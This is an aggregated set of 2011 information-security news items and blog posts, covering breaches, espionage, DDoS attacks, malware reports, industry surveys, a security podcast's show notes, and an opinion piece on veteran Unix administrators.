Faced with an attack surface that seems to be growing at an overwhelming rate, many security professionals are beginning to wonder whether their jobs are too much for them, according to a study published last week.
Conducted by Frost & Sullivan, the 2011 (ISC)2 Global Information Security Workforce Study (GISWS) says new threats stemming from mobile devices, the cloud, social networking, and insecure applications have led to "information security professionals being stretched thin, and like a series of small leaks in a dam, the current overworked workforce may be showing signs of strain."
"In the modern organization, end users are dictating IT priorities by bringing technology to the enterprise rather than the other way around," said Robert Ayoub, global program director for network security at Frost & Sullivan. "Pressure to secure too much and the resulting skills gap are creating risk for organizations worldwide … They are being asked to do too much, with little time left to enhance their skills to meet the latest security threats and business demands."
As of 2010, Frost & Sullivan estimates that there are 2.28 million information security professionals worldwide. Demand for professionals is expected to increase to nearly 4.2 million by 2015, with a compound annual growth rate of 13.2 percent.
For as much as Mac OS X has a reputation for being safer than Windows, security researchers won’t hesitate to point out that the opposite is, in fact, true. Indeed, the primary reason why the Mac has been relatively immune from security threats often found on Windows is because the Mac’s relatively paltry market share makes it an unattractive target for malicious hackers. Put differently, when it comes to code quality as it pertains to security, the Mac is not the safe-haven many assume it is.
But with Apple selling record numbers of Macs quarter after quarter, Apple’s PC marketshare is slowly but surely increasing. Moreover, as hackers become more sophisticated, malware is increasingly becoming OS independent. As a result, Apple needs to devote a lot more attention to system security and recent moves over the past few months indicate that Apple is up for the challenge.
This past Thursday, Apple doled out a beta of OS X Lion to developers. In conjunction with that, Apple is also reaching out to noted security experts and offering them free previews of OS X 10.7 so that they can take a look at Apple’s new security measures and presumably reach back to Apple with any thoughts, observations, and concerns they might have.
Apple reportedly sent out the following letter to an undisclosed number of security researchers.
“I wanted to let you know that I’ve requested that you be invited to the prerelease seed of Mac OS X Lion, and you should receive an invitation soon,” the letter reads. “As you have reported Mac OS X security issues in the past, I thought that you might be interested in taking a look at this. It contains several improvements in the area of security countermeasures.”
“The frequency of cyber espionage in the banking sector of Georgia has increased, parallel to the increase in competition,” said Lasha Pataraia, Director of the Information Security Studies and Analysis Centre, an NGO working on analyzing cyber security issues in Georgia. Because of the low salaries in some of the banks, some employees do corporate espionage for their own private profit. The banks try not to divulge these facts, because it damages their reputation.
Based on an anonymous source, with whom The FINANCIAL spoke last week, KorStandard Bank is one of the victims targeted by cyber spies. Vaghtang Kuprashvili, head of the IT department of KSB denied the existence of corporate espionage at the Bank and said that the Bank is implementing all international standards for cyber security.
As Pataraia explained corporate espionage is an issue for all banks who have a large client base and turnover. Modern technologies were already adopted in the banking sector long ago, but they are currently establishing new technologies of an automatic leading system in the state sector. Most popular among big companies and state organizations is the ERP system, which gives the absolute possibility to do massive automatisation and save human resources.
“Due to the automatisation processes cyber espionage does not only exist in our country, but is at this time more active than ever. This is a companion and parallel process of technology development,” noted Lasha Pataraia
Police officials are investigating a mysterious break-in at the five-star Lotte Hotel, an odd bit of cloak and dagger in Room 1961 whose storyline includes bumbling spies caught red-handed, negotiations for a supersonic jet fighter, a stolen laptop and a conveniently timed meeting with the president of South Korea.
Accounts from the police, local news media, government officials and hotel employees laid out a whodunit tale of the break-in, which took place last Wednesday when visiting Indonesian government and military officials left their rooms at the Lotte for a late-morning meeting with President Lee Myung-bak.
The Indonesians went to the Blue House, the presidential residence and offices, to discuss the purchase of military jets from the government-backed Korea Aerospace Industries. (The Korean plane, the T-50 Golden Eagle, is an advanced jet trainer that can be upgraded to a fighter-bomber. It is being considered for purchase by the Indonesians, who are also considering a subsonic Russian plane, the Yak-130.)
The Indonesians, traveling with their own security personnel, left their
rooms unguarded, with their work computers and private documents inside, the police and Indonesian officials said later. The Indonesian group comprised as many as 50 people, reports said, including Defense Minister Purnomo Yusgiantoro.
Soon after the Indonesians left their rooms, two men and a woman went up to the 19th floor and entered Room 1961, the police said. Inside were two laptops.
A Texas man has admitted hacking into servers owned by an e-commerce company and making off with about $275,000. Jeremey Parker of Houston also copped to charges of breaking into servers maintained by NASA's Goddard Space Flight Center in Maryland and causing some $43,000 of damage.
The hacking spree spanned a 10-month stretch starting in December 2008 with the breach of systems owned by SWReg. A subsidiary of Digital River of Minnesota, the company manages royalties for independent software developers. “Parker hacked into SWReg's system, created the money by crediting the SWReg accounts, and then caused that money to be wire transferred to his bank account instead of the accounts of several developers,” a press release issued by the US Attorney's office in Minnesota said.
The NASA servers Parker hacked gave paying members of the scientific community access to oceanic data being sent to Earth from satellites. Eventually, the data was made available to everyone.
Source: http://www.infosecurity-magazine.com/view/16063/free-risk-analysismanagement-app-released-for-iphone-ipad-and-ipod-touch Citicus, a corporate risk management and compliance specialist, has released a risk analysis/management app for the iOS range of Apple devices – the iPhone, iPad and iPod touch. The firm says that it hopes that the unique app – which is offered for free – will offer simple way for decision-makers to identify the potential business impact of their organisation's assets and processes being disrupted. The app – Citicus MoCA – is billed as being easy to use and "enables a wider range of stakeholders to discover, assess and highlight the relative importance of their information resources, supplier relationships, products, sites and any other types of asset or process they depend on." In use, the app allows users to assess what is at stake in relation to a particular asset – e.g. a system, site or supply of goods or services – by identifying the maximum credible loss an organisation could suffer in a worst-case incident. Geordy's comments: Tried this one out. It's a good idea and a good start but the model they use still produces a result along the lines of red, yellow & green light sort of analysis. To me, that's far too subjective. IMO, it would be far more useful if it quantified the risk in a dollar amount.
Online crime was up again in 2010, hitting its second-highest numbers of the past decade, according to a report issued by federal law enforcement authorities yesterday.
According to the "2010 Internet Crime Report," the Internet Crime Complaint Center (IC3) received 303,809 complaints of Internet crime in 2010, the second-most in its 10-year history.
IC3 is a partnership between the Federal Bureau of Investigation (FBI) and the National White Collar Crime Center (NW3C). Since its creation in 2000, IC3 has received more than 2 million Internet crime complaints.
IC3 received and processed an average of 25,317 complaints per month in 2010, according to the report. Nondelivery of payment or merchandise accounted for the most complaints (14.4 percent). Scams using the FBI's name (13.2 percent) and incidents of identity theft (9.8 percent) rounded out the top three types of complaints.
In 2010, IC3 referred nearly half of all complaints (121,710) to law enforcement for further investigation, according to the report.
"We encourage individuals to report Internet crime through the IC3 Web portal," says Gordon Snow, assistant director of the FBI's Cyber Division. "The IC3 is a unique resource for federal, state, and local law enforcement to intake cases efficiently, find patterns in what otherwise appear to be isolated incidents, combine multiple smaller crime reports into larger, higher priority cases, and ultimately bring criminals to justice."
NW3C has developed a companion website for the 2010 report. The site features detailed information about Internet crime trends in all 50 states.
We've moved to the new host so hopefully everything is working correctly. We'll are adding back all the older Episodes, so for those of you that are interested they should be available via web stream, direct download, iTunes and RSS feed.
Episode 331 – StreetView, Sony vs. MSFT, OddJob, 9 Traits, Reboot or Not?, Collective Defense & Real Risk
ISDPodcast Episode 331 for February 25, 2011. Tonight’s podcast is hosted by Rick Hayes, Keith Pachulski and Varun Sharma.
OWASP February Chapter Meeting:
When: February 28, 2011 6-8pm
Where: Tilted Kilt http://tinyurl.com/4oh2thj
My Hard Drive Died
Data Recovery Expert Certification
When: March 7-11,2011
Where: Washington, DC
Data Recovery Expert Certification
When: June 6-10, 2011
Where: Atlanta, GA
When: March 18-19, 2011
Where: Atlanta, GA
CFP open now! http://bit.ly/dJoIM9
Unlock Indy Event
When: March 19, 2011 4pm – 8pm
Where: Indiana University-Purdue University Indianapolis, Informatics & Communications Technology Complex building 535 W. Michigan Street Indianapolis, IN
Cost: $30 or more donation to the Hoosier Veterans’ Assistance Foundation of Indiana (www.hvaf.org)
Information Security Leaders Survey: https://www.surveymonkey.com/s/isl-2011-certsurvey
Intro/Outro Music provided by JimmyZ (http://soundcloud.com/jimmyz)
Google has long-battled concerns that its Street View offering infringes on individual privacy, but the mapping service’s expansion into Israel is sparking concerns that terrorists could use the detailed information to carry out attacks, endangering the public and government officials. On Monday, a government team chaired by minister Dan Meridor heard testimony from experts who discussed the implications of privacy concerns and public security, tourism, and country image, according to a government release. After directing these experts to continue working to “protect vital public interests regarding this innovative project,” Israel’s government decided to continue cooperating with Google in order to operate the Street View service within the nation “as soon as possible,” the government said.
The country hopes Street View can help promote the country’s tourism industry by showcasing attractions. “Street View could be very useful in public spaces, parks, museums, hotels, and places of historical, cultural, and religious interest. It could significantly help tourism. A Street View of the old city in particular could prove very popular,” wrote Andre Oboler, director of the Community Internet Engagement Project at the Zionist Federation of Australia, wrote in a blog in the Jerusalem Post on Sunday.
Not all regions should appear, cautioned some government officials. In particular, Israel is concerned about photographing sensitive locations, such as areas near the homes of the president and prime minister, retired lieutenant colonel Mordechai Kedar told the Associated Press. “We already have problems with Google Earth, which exposes all kinds of facilities,” said Kedar, who spent 25 years with Israeli intelligence, noting that Street View could facilitate terrorist attacks within the nation. Like some counterparts in Europe and the United States, individual Israelis also may be concerned. Israel has privacy laws in place, and Google must comply, Yoram Hacohen, an attorney who heads the Israeli law, information, and technology authority at Israel’s Justice Ministry, told iBlogAuto.
“The law mandates that the public be informed by anyone collecting information for a database. If it wants to operate the service, it must advertise in newspapers that it plans to photograph particular areas. Anyone who doesn’t want to be photographed must approach Google ahead of time and ask not to be,” he said. “It’s clear that the public must be informed about these activities. If someone discovers himself on Street View and wants to have the image removed, there is a way to do this in the system. A person can erase himself. We will ask that the erasure and application processes be in Hebrew and not English.” To collect data for Street View, Google sends out specially equipped cars to film all streets and buildings. In the process, the autos sometimes capture individuals, and the cars’ equipment also has grabbed users’ unencrypted wireless network data. Currently, Google offers the three-dimensional tour service in 27 countries, including the United States, United Kingdom, Canada, Germany, and France.
Google does not have a specific launch date in mind for an Israeli service, according to published reports. The company on Monday declined to reveal which cities it would like to dispatch Street View vehicles to first, but it is said to be interested in Tel Aviv, Jerusalem, and possibly Haifa, said the Zionist Federation’s Oboler. “We aim to offer the benefits of street-level imagery to users all around the world, however, we have nothing specific to announce at this time,” Google told the AP.
Although the government debate may mark Google Street View’s first formal entry into Israel, the developer is not new to the country. In September 2010 it acquired Quiksee — also known as MentorWave Technologies — for an estimated $10 million, and in April 2010 it bought LabPixies for about $25 million. Quiksee develops 3D tour software that lets users add to a Google map, creating an image similar to that shown in Street View. For its part, LabPixies writes widgets for iGoogle, Android, and the iPhone.
Imagine you’re a gaming console manufacturer, and some kid hacks your console to do “neat tricks.” Do you help him or sue him? The question isn’t a hypothetical one; currently, two rival companies have each taken one of these roads. What remains to be seen is which approach will be more profitable, both financially and in terms of gamer goodwill. Microsoft is set to release a Kinect software developer kit (SDK) to academics and enthusiasts later this spring; the company really is welcoming hackers and curious minds to go to town on its hands-free gestural control interface. Who could have guessed that the Windows maker, which has struggled to shake an unjustly stodgy image, would be the first to invite experimental development on its gaming platform? Or that its biggest rival in the gaming space, Sony and the PlayStation 3, would be gathering some bad PR of its own for suing PS3 hackers at the same time?
Here’s the skinny: Sony is suing, among other entities, George Hotz, a.k.a. geohot, a 21-year-old hacker who is well known for his iPhone jailbreaking. In fact, Hotz created the first-ever public software exploit for jailbreaking the iPhone 3GS. After working on jailbreak software for the iPhone 4, iPad and a slew of other Apple devices, Hotz turned his attention to the PlayStation 3. Hotz hacked on the PS3 for at least seven months, successfully opening up the console for homebrew games and PS2 emulation. Along the way, he released the root key (also known as the metldr key), which decrypted the PS3′s loaders, allowing anyone who wanted to open up their own PS3s to do so.
Because of that, Hotz is now knee-deep in a bitter lawsuit with Sony, a lawsuit that’s cost him more than he can afford to pay. In fact, he had to beg the Internet for the more than $10,000 he needed to cover his legal bills. While Sony says Hotz violated copyrights and committed computer fraud, Hotz, who claims to have never played a pirated game in his life, retorts, “They don’t really care about piracy; they care about control.” In a stark contrast, Microsoft seems to not give two shakes about control, at least as far as hacking with the Kinect is concerned. The company’s brand new gestural control system is as hot as it is financially successful. While many corporations would keep a money-maker like that tightly locked down, Microsoft is doing everything it can to invite more hackers to play with and create experiments with the Kinect.
Microsoft’s big test came last November when a prominent Google engineer staged a Kinect-hacking contest. Previously, Microsoft had made statements that it wanted to make Kinect tamper-proof and would work with law enforcement to ensure that it remained so. But the company changed its tune last November, saying it was “excited to see that people are so inspired” by the possibilities inherent in the Kinect. Since then, hackers have used the Kinect for everything from World of Warcraft “magic” to music video production.
And today, given the success of Kinect hacking for Xbox, Microsoft announced it will release a non-commercial “Kinect for Windows” SDK. The company says the reason for “a starter kit for application developers is to make it easier for academic research and enthusiast communities to create even richer experiences using Kinect technology.”
The SDK is coming from Microsoft Research (MSR) in collaboration with the Interactive Entertainment Business (IEB), and it will give devs “deep Kinect system capabilities such as audio, system APIs, and direct control of the sensor.” A commercial version of the SDK will be available soon. The bigger picture Microsoft is trying to convey is that, as a company, Microsoft has long been excited about natural user interfaces; and it wants you, the hacker, to be excited about them, too. Granted, there are still likely some strings attached, and we doubt the company would be tickled to have you blog about Xbox jailbreak codes.
Nevertheless, suing users who hack your console versus helping users who hack (part of) your console are two interesting and opposed actions that are likely to be judged with great relish in the court of popular opinion. How should Sony be handling geohot and other PS3 hackers who just want to make the console do neat tricks? Is this lawsuit really doing anything other than garnering the multinational corporation a boatload of bad PR?
A new banking Trojan seizes browser session ID tokens to keep users logged into their accounts long after they think they’ve logged off. The malware sends data to remote servers in real time, enabling cybercriminals to stealthily hijack a browsing session and gives them plenty of time to funnel money out of accounts. OddJob is unlike the Zeus and Spyeye Trojans, which use a man-in-the-browser hacking technique to ride a session locally and manipulate HTML pages, Klein said. Instead, OddJob takes the session token from the victim’s computer, clones it and sends it in real-time to a command and control server where a cybercriminal can remotely access the banking session.
The OddJob Trojan was designed to intercept a user’s banking communications through the browser. It can run on Internet Explorer and Mozilla Firefox. The malware can also be targeted directly at financial institutions, Klein said, injecting malicious code on vulnerable banking websites. In addition to session hijacking, the attackers added HTML injection and a few other features, which make it appear that they are gearing up for much broader attacks, Klein said. While OddJob is nowhere near the size and scope of Zeus of Spyeye, the attackers are manipulating the feature set and could gain a larger foothold, Klein said.
Veteran Unix admin trait No. 1: We don’t use sudo
Much like caps lock is cruise control for cool, sudo is a crutch for the timid. If we need to do something as root, we su to root, none of this sudo nonsense. In fact, for Unix-like operating systems that force sudo upon all users, the first thing we do is sudo su – and change the root password so that we can comfortably su – forever more. Using sudo exclusively is like bowling with only the inflatable bumpers in the gutters — it’s safer, but also causes you to not think through your actions fully.
Veteran Unix admin trait No. 2: We use vi, not emacs, and definitely not pico or nano
While we know that emacs is near and dear to the hearts of many Unix admins, it really is the Unix equivalent of Microsoft Word. Vi — and explicitly vim — is the true tool for veteran Unix geeks who need to get things done and not muck about with the extraneous nonsense that comes with emacs. Emacs has a built-in game of Tetris, for crying out loud.
Veteran Unix admin trait No. 3: We wield regular expressions like weapons
To the uninitiated, even the most innocuous regex looks like the result of nauseous keyboard. To us, however, it’s pure poetry. The power represented in the complexity of pcre (Perl Compatible Regular Expressions) cannot be matched by any other known tool. If you need to replace every third character in a 100,000-line file, except when it’s followed by the numeral 4, regular expressions aren’t just a tool for the job — they’re the only tool for the job. Those that shrink from learning regex do themselves and their colleagues a disservice on a daily basis. In just about every Unix shop of reasonable size, you’ll find one or two guys regex savants. These poor folks constantly get string snippets in their email accompanied by plaintive requests for a regex to parse them, usually followed by a promise of a round of drinks that never materializes.
Veteran Unix admin trait No. 4: We’re inherently lazy
When given a problem that appears to involve lots of manual, repetitive work, we old-school Unix types will always opt to write code to take care of it. This usually takes less time than the manual option, but not always. Regardless, we’d rather spend those minutes and hours constructing an effort that can be referenced or used later, rather than simply fixing the immediate problem. Usually, this comes back to us in spades when a few years later we encounter a similar problem and can yank a few hundred lines of Perl from a file in our home directory, solve the problem in a matter of minutes, and go back to analyzing other code for possible streamlining. Or playing Angry Birds.
Veteran Unix admin trait No. 5: We prefer elegant solutions
If there are several ways to fix a problem or achieve a goal, we’ll opt to spend more time developing a solution that encompasses the actual problem and preventing future issues than simply whipping out a Band-Aid. This is related to the fact that we loathe revisiting a problem we’ve already marked “solved” in our minds. We figure that if we can eliminate future problems now by thinking a few steps ahead, we’ll have less to do down the road. We’re usually right.
Veteran Unix admin trait No. 6: We generally assume the problem is with whomever is asking the question
To reach a certain level of Unix enlightenment is to be extremely confident in your foundational knowledge. It also means we never think that a problem exists until we can see it for ourselves. Telling a veteran Unix admin that a file “vanished” will get you a snort of derision. Prove to him that it really happened and he’ll dive into the problem tirelessly until a suitable, sensible cause and solution are found. Many think that this is a sign of hubris or arrogance. It definitely is — but we’ve earned it.
Veteran Unix admin trait No. 7: We have more in common with medical examiners than doctors
When dealing with a massive problem, we’ll spend far more time in the postmortem than the actual problem resolution. Unless the workload allows us absolutely no time to investigate, we need to know the absolute cause of the problem. There is no magic in the work of a hard-core Unix admin; every situation must stem from a logical point and be traceable along the proper lines. In short, there’s a reason for everything, and we’ll leave no stone unturned until we find it.
To us, it’s easy to stop the bleeding by HUPping a process or changing permissions on a file or directory to 777, but that’s not the half of it. Why did the process need to be restarted? That shouldn’t have been necessary, and we need to know why.
Veteran Unix admin trait No. 8: We know more about Windows than we’ll ever let on
Though we may not run Windows on our personal machines or appear to care a whit about Windows servers, we’re generally quite capable at diagnosing and fixing Windows problems. This is because we’ve had to deal with these problems when they bleed over into our territory. However, we do not like to acknowledge this fact, because most times Windows doesn’t subscribe to the same deeply logical foundations as Unix, and that bothers us. See traits No. 5 and 6 above.
Veteran Unix admin trait No. 9: Rebooting is almost never an option
Unix boxes don’t need reboots. Unless there’s absolutely no other option, we’ll spend hours fixing a problem with a running system than give it a reboot. Our thinking here is there’s no reason why a reboot should ever be necessary other than kernel or hardware changes, and a reboot is simply another temporary approach to fixing the problem. If the problem occurred once and was “fixed” by a reboot, it’ll happen again. We’d rather fix the problem than simply pull the plug and wait for the next time.
Server reboots should be rare — very rare. Kernel updates and hardware replacement are the two leading causes of reboots in the Unix world. Some have mentioned significant security risks in not rebooting servers, but that’s nonsense. If there’s a security risk present in a service or application, a patch can be applied without requiring a reboot. If the security risk is present in a kernel module, it’s generally possible to unload the module, apply a patch, and reload the module. Yes, you need to reboot if there’s a security risk in the kernel. Otherwise, there’s no real reason to reboot a Unix box. Some argued that other risks arise if you don’t reboot, such as the possibility certain critical services aren’t set to start at boot, which can cause problems. This is true, but it shouldn’t be an issue if you’re a good admin. Forgetting to set service startup parameters is a rookie mistake. Naturally, if you’re building the box and it’s not in production, you can do all the reboot tests you want without adverse effects. That’s just good practice.
But there’s another side: Those who consider reboots to be a worthy troubleshooting step are going to get themselves in trouble sooner rather than later. Let’s say a Unix box has gone wonky. A few services that were running will no longer start, maybe with a segfault, and other oddities abound.
If you shrug and reboot the box after looking around for a few minutes, you may have missed the fact that a junior admin inadvertently deleted /boot and some portions of /etc and /usr/lib64 due to a runaway script they were writing. That’s what was causing the segfaults and the wonky behavior. But since you rebooted the server without digging into the problem, you’ve made it much worse, and you’ll soon boot a rescue image — with all kinds of ponderous work awaiting you — while a production server is down. This is but one significant reason reboots in the Unix world should be extremely rare. Rather than a troubleshooting step, they’re a Hail Mary approach to server administration. In short, nobody ever fixed a problem caused by a full /var partition by rebooting the box.
In many cases, it’s extremely important not to reboot, because the key to fixing the problem is present on the system before the reboot, but will not be immediately available after. The problem will recur, and if the only known solution is to reboot, then the problem will never be fixed unless or until someone decides not to reboot and instead tries to find the root of the problem. Unfortunately, that’s not as common as it should be. Face it — a bad stick of RAM cares not a whit about system uptime or when the box was last booted. It’ll cause problems no matter what. The next time you’re looking at a problem and someone says, “Hey, let’s just reboot the thing,” make sure you’ve exhausted every other possibility before you send it to init 6. The time and pain you save will definitely be your own.
Echoing the comments of Microsoft security chief Scott Charney from his keynote calling for a “collective defense” of the Internet, this session’s panelists called for a combined government and private sector response to the threat. Mike McConnell, who was Director of National Intelligence under President George W. Bush, and director of the National Security Agency under President Clinton, said the way to approach the threat is to have the government determine the objective to address a certain cyber threat and let the private sector compete to determine how best to meet that objective. McConnell, now an executive vice president at the consulting firm Booz Allen Hamilton, cited the example of the volume of financial transactions between the two largest banks that are the lifeblood of the U.S. economy, moving $7 trillion to $8 trillion a day.
“To protect those transactions there should be a requirement for a higher level of protection to mitigate that risk,” he said, but that government should set the requirement and the private sector should compete to figure out how to meet it. Bruce Schneier, chief technology security officer of BT Managed Security Solutions and a frequent author and speaker — also frequently quoted — on computer security, agreed. “Regulate results, not technology.” Schneier said. “If you regulate technology, you stifle innovation. If you regulate results, you incent innovation.”
However, he said there’s a limit to how much private companies will spend to protect themselves from cyber attack. He argued that businesses will only spend to protect their networks up to the value of their companies, but that there may be damage to the public and the economy that is much greater than that. “The market won’t be able to solve that because the risk is greater than the company doing the work,” Schneier said.
Another solution to improving network security could be requiring companies to certify that they have taken the proper steps, said Michael Chertoff, former Secretary of Homeland Security under Bush and also a member of the 2010 RSA panel. Chertoff called for a regulatory framework where company executives and board members sign on the dotted line, certifying what steps they have taken to secure their network, what backup systems they have in place and what level of resiliency is built into their IT system. “People take that seriously. Is it dramatic? No, but it moves the ball down the field,” Chertoff said.
Schneier concurred, noting that holding individuals at a company accountable for certain protections has worked with environmental regulations and Sarbanes-Oxley, the post-Enron law that requires directors and executives to certify their financial results.
Given the strong response from some readers to my earlier post about a government “National ID” proposal in Charney’s keynote, it was nice to hear these panelists downplay the either-or argument — government or no government — and advocate a third way that asks, as Rodney King famously did, “Can’t we all just get along?”
Toward the end of 2010, Symantec surveyed more than 3,000 workers in North America and Europe about the risks they take with information in the workplace. The results paint a troubling picture that shows employees are ignoring risks posed by being careless with company data.
Employees tend to be risk takers with 46% taking risks “when appropriate” and 21% admitting that they “like to take risks.” While 60% of workers surveyed said they were more cautious with their online behavior at work than at home, this did not prevent 54% of them from removing information from company systems without permission.
They know they shouldn’t remove corporate data from the workplace, but they do it anyways because they seem to think either that company security policies are a hindrance to their jobs or that they can get away with it as long as they’re careful. In the simplest terms, employees believe it’s okay to do the wrong thing as long as it’s for the right reasons.
In fact, reasons people gave for removing information from company systems without permission were mostly reasons that ENABLED them to do their jobs.
34% wanted to work from home
32% needed information for an off-site meeting
22% were trying to keep the information “safe”
Furthermore, these users are choosing to remove information by insecure means, which isn’t really surprising.
41% uploaded files to staging sites
38% emailed information to webmail accounts or third parties
28% wrote data to a USB stick, external hard drive or MP3 player
23% wrote them to CD or DVD
What does all of this mean for information protection? IT departments are often so focused on malicious threats from outsiders and rogue insiders that the risks posed by the everyday insider just doing his job are overlooked—a critical mistake. Clearly, workers are confused by the issue of information protection. Beyond deploying the right technologies to prevent data loss, it’s important that IT departments work with employees to explain why security policies matter, not just what they are.
- Whitelisting / Blacklisting: Whitelisting software may not have checksums yet to verify all the files that are modified by the service pack. Same for anti-virus: Some anti virus products monitor system files for changes and may sound an alert or block the installation of SP 1
- Firewalls: Third party firewalls may find that some of the low level hooks they use have changed.
- Disk Encryption: In particular full disk encryption that modifies the boot process may find that some of the changes it did are undone by the SP install
- Custom hardware: If you are using drivers other then those that are included in Windows 7 (or 2008 R2), be careful.
Specific examples. Consider them anecdotal but if you run any software mentioned here, or similar software, this list should give you a guide to test.
Users with old versions of Microsoft Security Essentials may not be able to install SP1. Upgrade first.
Samsung Galaxy S phone drivers may have problems with SP1
some users reported very long install times (> 1hr. but not all that unusual for a service pack)
Chrome 10 and 11 have issues according to some tweets
Word 2003 VBA
slower boot times with SP1 then without
some reports of download issues due to overloaded servers
Lenovo’s Thinkvantage System Update may not work (update it before applying the SP)
EVGA Precision Utility 2.0.2 (Graphics card stats program liked by gamers)
some issues with Bitlocker are reported. But no confirmation at this point and it may also be due to entering the wrong password on reboot (you have to reboot a couple times in certain situations)
SecureState released a new module for the Metasploit Framework that allows users to brute force credentials on Microsoft OWA servers. The module, written in Ruby, forges HTTP requests (both GET and POST) to simulate a user logging into the web service. By checking the responses, the module determines whether the authentication succeeded and reports the information to the user. This is often useful on penetration tests when the attacker has a list of Active Directory users but no services that are using domain authentication.
The module that SecureState developed can be used to test credentials against both 2003 and 2007 servers. Because the module is implemented within the Metasploit Framework, it takes advantage of the features available within it such as logging credentials to the internal database. SecureState has submitted this module to the Metasploit Developers and is awaiting its integration with the Metasploit Trunk.
According to Matt Neely (@matthewneely), we should look for SecureState to release new tool once every week (or two).
The PCI Council has introduced a series of instructor-led PCI Awareness training courses for 2011, the first of which took place in San Francisco on February 18. Another in-person training seminar is slated for March 11 in London. “The awareness training is intended for anybody who wants to learn more about PCI”, said Bob Russo, general manager of the PCI Council. He told Infosecurity that the courses contain four modules that cover all PCI basics, including how the payment system operates straight through to how PCI works and why it is important to be compliant.
We can say confidently that [PCI compliance] is the best defense you will have against a breach, but by no means is this the ceiling”, Russo added. “This is basically the minimum you should be doing – anything you can add to it is an additional layer that makes it more secure.” Source:http://news.idg.no/cw/art.cfm?id=3F6822FF-1A64-6A71-CE67724BB606D61C
The outage of Dutch bank Rabobank last weekend was caused by a massive DDoS attack. The perpetrators are still unknown. The bank reports the attack to the police.
After two days of mystery surrounding the outage Rabobank gave Dutch IDG-title Webwereld a statement explaining the breakdown of both its website and its e-banking services. The Dutch bank was hit by a large DDoS attack (Distributed Denial of Service). The outage of Rabobank happened saturday evening and again sunday afternoon. The website and e-banking services were inaccessible for desktop and mobile users.
The DDoS attack also caused an outage in the Dutch central payment system iDeal. That alternative to PayPal was flooded with returned transaction messages from the attacked bank. This DoS-’attack’ (Denial of Service) caused the payment system to go partially down. A spokesperson for iDeal-operator Currence tells Webwereld that the buffer of one of its two platforms was filled up. Banks that were connected to that affected platform were also unable to process iDeal payments.
Rabobank has now stated that is was under attack by unknown parties. The website Rabobank.nl was bombarded with large amounts of traffic and subsequently collapsed. This was done with intent, says the bank. It will therefore file a police report about this DDoS attack. A spokesman could not tell Webwereld where the DDoS attack originated. “That is part of the investigation, about which we wil make no statements.”
The bank already suspected that the outage was caused by malicious intent. It did not utter this suspension publicly until tuesday evening after it had confirmed the cause of the breakdown. Questions from Webwereld about the nature of the problem and the countermeasures had therefore not been answered yet.
Rabobank’s e-banking service was unreachable during the weekend on both saturday and sunday. To deflect the attack Rabo altered the DNS (domain name system) records for it’s website. As a result the site was unreachable for the attackers but also for the general public.
Dutch customers of the bank have been complaining about the site and e-banking system being down long after the actual outage had been resolved. The bank was in discussions with local telecoms companies and internet providers to provide connections to Rabobank for their respective customers. This took until monday. Customers outside of the Netherlands were cut of until at least tuesday afternoon.
Last week the centralized website of the Dutch government (Rijksoverheid.nl) was hit by a massive DDoS attack. A spokesperson told Webwereld that the attack originated “from a foreign country”, but refused to specifiy that claim. The government website was offline for several hours. During that attack the website of the government organisation Rijkswaterstaat.nl was also hit, albeit only for a short time. The government has filed a police report. Source:http://www.bloomberg.com/news/2011-02-24/exxon-shell-bp-said-to-have-been-hacked-through-chinese-internet-servers.html
Attackers from China broke into and stole proprietary information from the networks of six U.S. and European energy companies, including Exxon Mobil Corp., Royal Dutch Shell Plc and BP Plc, according to one of the companies and investigators who declined to be identified.
McAfee Inc., a cyber-security firm, reported Feb. 10 that such attacks had resulted in the loss of “project-financing information with regard to oil and gas field bids and operations.” In its report, Santa Clara, California-based McAfee, assisted by other cyber-security firms, didn’t identify the energy companies targeted. The attacks, which it dubbed “Night Dragon,” originated “primarily in China” and occurred during the past three years.
The list of companies hit, none of which disclosed the attacks in filings with regulators, also includes Marathon Oil Corp., ConocoPhillips and Baker Hughes Inc., according to the people who worked on or are familiar with the companies’ investigations and asked not to be identified because of the confidential nature of the matter.
Chinese hackers broke into the computer network of Baker Hughes, said Gary Flaharty, spokesman for the Houston-based provider of advanced drilling technology. Baker Hughes concluded the incident didn’t need to be disclosed because it wasn’t material to investors, he said, declining to comment further.
In some of the cases, hackers had undetected access to company networks for more than a year, said Greg Hoglund, chief executive officer of Sacramento, California-based HBGary Inc., a cyber-security company that investigated some of the security breaches at oil companies. Hoglund, who was cited by McAfee as a contributor to its report, declined to identify his clients.
“Legal information, information on deals and financial information are all things that appear to be getting targeted,” Hoglund said, summing up conclusions his firm made from the types of documents and persons targeted by the hackers. “This is straight up industrial espionage.”
Hackers targeted computerized topographical maps worth “millions of dollars” that show locations of potential oil reserves, said Ed Skoudis, whose company, Washington-based InGuardians Inc., investigated two recent breaches of U.S. oil companies’ networks. He declined to name his clients or the origin of the hackers.
The McAfee report described the techniques used to get into the energy company computers as “unsophisticated” and commonly used by Chinese hackers. The attacks began in November 2009, McAfee said. Two cyber investigators familiar with the probes said the attacks began even earlier — in 2008 — and involved several well-financed groups. The investigators asked not to be identified because the company investigations are private.
McAfee based the report on information gathered from its own work on the breaches and from others who were directly involved in investigating them. The report, produced on the condition that the affected companies not be identified, was done to “educate the community,” said Ian Bain, a McAfee spokesman.
The thefts of oil company data like those in the McAfee report match the profile of industrial espionage operations that have the backing or consent of the Chinese government, said Joel Brenner, former head of U.S. counterintelligence during the Bush and Obama administrations and now a lawyer with Cooley LLP in Washington. In his former post, one of Brenner’s jobs was tracking spying efforts against U.S. companies from foreign countries.
Even when the next-generation storage devices show that files have been deleted, as much as 75 percent of the data contained in them may still reside on the flash-based drives, according to the research, which is being presented this week at the Usenix FAST 11 conference in California. In some cases, the SSDs, or sold-state drives, incorrectly indicate the files have been “securely erased” even though duplicate files remain in secondary locations.
The difficulty of reliably wiping SSDs stems from their radically different internal design. Traditional ATA and SCSI hard drives employ magnetizing materials to write contents to a physical location that’s known as the LBA, or logical block address. SSDs, by contrast, use computer chips to store data digitally and employ an FTL, or flash translation later, to manage the contents. When data is modified, the FTL frequently writes new files to a different location and updates its map to reflect the change.
In the process left-over data from the old file, which the authors refer to as digital remnants, remain.
Unsurprisingly, Westboro spokesperson Shirley Phelps-Roper attempted to downplay the incident, claiming that Anonymous had been trying to hack the site for at least several days.
“What they did was break into one server. They tried mightily for four days. They got nothing,” she said. “I’m [really quite] sure they worked it all out before.”
Meanwhile, an Anonymous Twitter tweet offered some indication that the Westboro hack may have been slightly more difficult to pull off than the the HBGary breach. “#WBC was more leet than #HBGary… It took #Anonymous a 0day to get in their network, not some public SQL.”
It should be noted that Westboro’s sites were recently knocked offline for a period of several days by an extensive DDoS campaign coordinated by The Jester.